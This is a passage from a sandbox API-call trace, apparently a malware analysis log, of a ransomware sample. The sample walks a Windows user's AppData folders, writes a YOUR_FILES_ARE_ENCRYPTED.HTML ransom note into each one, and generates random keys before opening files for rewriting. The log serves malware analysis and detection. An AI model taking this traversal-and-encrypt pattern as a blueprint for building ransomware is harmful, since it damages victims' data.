ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.868] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.868] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0110.868] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.869] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0110.869] GetProcessHeap () returned 0x600000 [0110.869] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\activesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0110.869] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0110.871] CloseHandle (hObject=0x308) returned 1 [0110.871] GetProcessHeap () returned 0x600000 [0110.871] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.871] GetProcessHeap () returned 0x600000 [0110.871] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.872] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0110.872] StrStrIW (lpFirst="Application Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.872] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data") returned 56 [0110.872] GetProcessHeap () returned 0x600000 [0110.872] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.873] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data" [0110.873] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\*" [0110.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0110.874] GetProcessHeap () returned 0x600000 [0110.874] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.874] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Comms", cAlternateFileName="")) returned 1 [0110.874] StrStrIW (lpFirst="Comms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.874] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms") returned 45 [0110.874] GetProcessHeap () returned 0x600000 [0110.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.874] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms" [0110.874] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*" [0110.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.874] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.874] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7529d375, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x7529d375, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="Temp", cAlternateFileName="")) returned 1 [0110.874] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.874] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp") returned 50 [0110.875] GetProcessHeap () returned 0x600000 [0110.875] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.876] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp" [0110.876] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*" [0110.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4cafec96, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4cafec96, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.876] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4cafec96, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4cafec96, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0110.876] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b315521, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4cafec96, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4cb00027, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="CalendarCache.dat", cAlternateFileName="CALEND~1.DAT")) returned 1 [0110.876] StrStrIW (lpFirst="CalendarCache.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.877] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat") returned 68 [0110.877] PathFindExtensionW (pszPath="CalendarCache.dat") returned=".dat" [0110.877] lstrlenW (lpString=".dat") returned 4 [0110.877] PathFindExtensionW (pszPath="CalendarCache.dat") returned=".dat" [0110.877] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\calendarcache.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.881] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=20) returned 1 [0110.881] CloseHandle (hObject=0x32c) returned 1 [0110.882] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b315521, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4cafec96, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x4cb00027, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="CalendarCache.dat", cAlternateFileName="CALEND~1.DAT")) returned 0 [0110.882] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.882] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0110.882] GetProcessHeap () returned 0x600000 [0110.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0110.883] WriteFile (in: hFile=0x30c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.884] CloseHandle (hObject=0x30c) returned 1 [0110.884] GetProcessHeap () returned 0x600000 [0110.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.884] GetProcessHeap () returned 0x600000 [0110.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.886] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="Unistore", cAlternateFileName="")) returned 1 [0110.886] StrStrIW (lpFirst="Unistore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.886] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore") returned 54 [0110.886] GetProcessHeap () returned 0x600000 [0110.886] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.887] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore" [0110.887] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\*" [0110.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.887] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0110.888] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 0 [0110.888] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.888] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0110.888] GetProcessHeap () returned 0x600000 [0110.888] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\unistore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0110.889] WriteFile (in: hFile=0x30c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.890] CloseHandle (hObject=0x30c) returned 1 [0110.891] GetProcessHeap () returned 0x600000 [0110.891] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.891] GetProcessHeap () returned 0x600000 [0110.891] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.892] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262a5092, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x262a5092, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0110.892] StrStrIW (lpFirst="UnistoreDB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.892] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB") returned 56 [0110.892] GetProcessHeap () returned 0x600000 [0110.892] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.893] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB" [0110.893] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\*" [0110.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262a5092, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x262a5092, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.893] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262a5092, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x262a5092, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0110.893] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23a0d188, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23a0d188, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26281999, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x600000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="store.vol", cAlternateFileName="")) returned 1 [0110.893] StrStrIW (lpFirst="store.vol", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.893] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") returned 66 [0110.893] PathFindExtensionW (pszPath="store.vol") returned=".vol" [0110.894] lstrlenW (lpString=".vol") returned 4 [0110.894] PathFindExtensionW (pszPath="store.vol") returned=".vol" [0110.894] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262a5092, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x262a5092, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x262f6e10, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="tmp.edb", cAlternateFileName="")) returned 1 [0110.894] StrStrIW (lpFirst="tmp.edb", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.894] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\tmp.edb") returned 64 [0110.894] PathFindExtensionW (pszPath="tmp.edb") returned=".edb" [0110.894] lstrlenW (lpString=".edb") returned 4 [0110.894] PathFindExtensionW (pszPath="tmp.edb") returned=".edb" [0110.894] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239e71ab, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239e71ab, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x262497be, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="USS.chk", cAlternateFileName="")) returned 1 [0110.894] StrStrIW (lpFirst="USS.chk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.894] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USS.chk") returned 64 [0110.894] PathFindExtensionW (pszPath="USS.chk") returned=".chk" [0110.894] lstrlenW (lpString=".chk") returned 4 [0110.894] PathFindExtensionW (pszPath="USS.chk") returned=".chk" [0110.894] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2624be36, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="USS.log", cAlternateFileName="")) returned 1 [0110.894] StrStrIW (lpFirst="USS.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.894] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USS.log") returned 64 [0110.894] PathFindExtensionW (pszPath="USS.log") returned=".log" 